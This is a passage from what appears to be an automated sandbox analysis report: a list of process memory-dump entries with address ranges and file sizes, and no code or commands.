                                                                                                                                  • memory/2252-218-0x00000000001F0000-0x00000000001F1000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2284-352-0x00000001402CA898-mapping.dmp
                                                                                                                                  • memory/2380-265-0x00000184735B0000-0x0000018473620000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    448KB

                                                                                                                                  • memory/2380-181-0x0000018472F60000-0x0000018472FD0000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    448KB

                                                                                                                                  • memory/2408-179-0x0000017F63070000-0x0000017F630E0000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    448KB

                                                                                                                                  • memory/2580-280-0x000001B7141B0000-0x000001B714220000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    448KB

                                                                                                                                  • memory/2580-168-0x000001B713E00000-0x000001B713E70000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    448KB

                                                                                                                                  • memory/2688-175-0x0000018AA5A00000-0x0000018AA5A70000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    448KB

                                                                                                                                  • memory/2696-170-0x000001371A060000-0x000001371A0D0000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    448KB

                                                                                                                                  • memory/2756-116-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/3116-200-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/3116-203-0x00000000030D0000-0x00000000030D2000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    8KB

                                                                                                                                  • memory/3252-128-0x0000000000A82000-0x0000000000B83000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    1.0MB

                                                                                                                                  • memory/3252-119-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/3252-130-0x00000000009F0000-0x0000000000A4C000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    368KB

                                                                                                                                  • memory/3520-135-0x00000000010C0000-0x00000000010C1000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/3520-125-0x0000000000BB0000-0x0000000000BB1000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/3520-166-0x000000001B840000-0x000000001B842000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    8KB

                                                                                                                                  • memory/3520-131-0x00000000010E0000-0x00000000010FC000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    112KB

                                                                                                                                  • memory/3520-129-0x00000000010B0000-0x00000000010B1000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/3520-120-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/3732-176-0x000001A40F440000-0x000001A40F4B0000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    448KB

                                                                                                                                  • memory/3732-136-0x00007FF774F54060-mapping.dmp
                                                                                                                                  • memory/3732-205-0x000001A411A00000-0x000001A411AFF000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    1020KB

                                                                                                                                  • memory/3912-367-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/3916-206-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/3916-208-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    88KB

                                                                                                                                  • memory/3928-266-0x0000026A6E500000-0x0000026A6E570000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    448KB

                                                                                                                                  • memory/3928-156-0x0000026A6E200000-0x0000026A6E24B000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    300KB

                                                                                                                                  • memory/3928-262-0x0000026A6E250000-0x0000026A6E29B000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    300KB

                                                                                                                                  • memory/3928-161-0x0000026A6E2C0000-0x0000026A6E330000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    448KB

                                                                                                                                  • memory/3996-238-0x0000000002285000-0x0000000002287000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    8KB

                                                                                                                                  • memory/3996-236-0x0000000002282000-0x0000000002284000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    8KB

                                                                                                                                  • memory/3996-228-0x0000000002280000-0x0000000002282000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    8KB

                                                                                                                                  • memory/3996-220-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/3996-237-0x0000000002284000-0x0000000002285000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/4076-286-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4120-359-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4140-366-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4148-361-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4168-229-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4168-232-0x00000000005E0000-0x00000000005ED000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    52KB

                                                                                                                                  • memory/4288-336-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4348-248-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4384-327-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4448-351-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4724-252-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4724-261-0x0000000003080000-0x00000000030DC000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    368KB

                                                                                                                                  • memory/4724-260-0x0000000002F7C000-0x000000000307D000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    1.0MB

                                                                                                                                  • memory/4752-288-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4760-363-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4776-292-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4816-347-0x0000000007200000-0x0000000007201000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/4816-345-0x0000000006B10000-0x0000000006B11000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/4816-348-0x00000000074B0000-0x00000000074B1000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/4816-343-0x0000000006B60000-0x0000000006B61000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/4816-342-0x0000000004430000-0x0000000004431000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/4816-338-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4816-346-0x00000000073E0000-0x00000000073E1000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/4852-339-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4928-364-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4940-241-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4952-357-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5052-245-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/5052-242-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5052-246-0x0000000000560000-0x00000000006AA000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    1.3MB

                                                                                                                                  • memory/5056-291-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5092-360-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5124-330-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5208-314-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5220-369-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5224-368-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5312-333-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    284KB

                                                                                                                                  • memory/5312-334-0x0000000000401480-mapping.dmp
                                                                                                                                  • memory/5344-318-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5368-315-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5408-297-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5428-354-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5488-365-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5576-349-0x0000000000402F68-mapping.dmp
                                                                                                                                  • memory/5576-320-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5616-323-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5668-301-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5684-302-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5756-353-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5784-344-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5828-305-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5836-325-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5936-358-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5952-306-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5960-355-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/6004-309-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/6036-310-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/6048-350-0x00000001401FBC30-mapping.dmp
                                                                                                                                  • memory/6084-311-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/6100-362-0x0000000000000000-mapping.dmp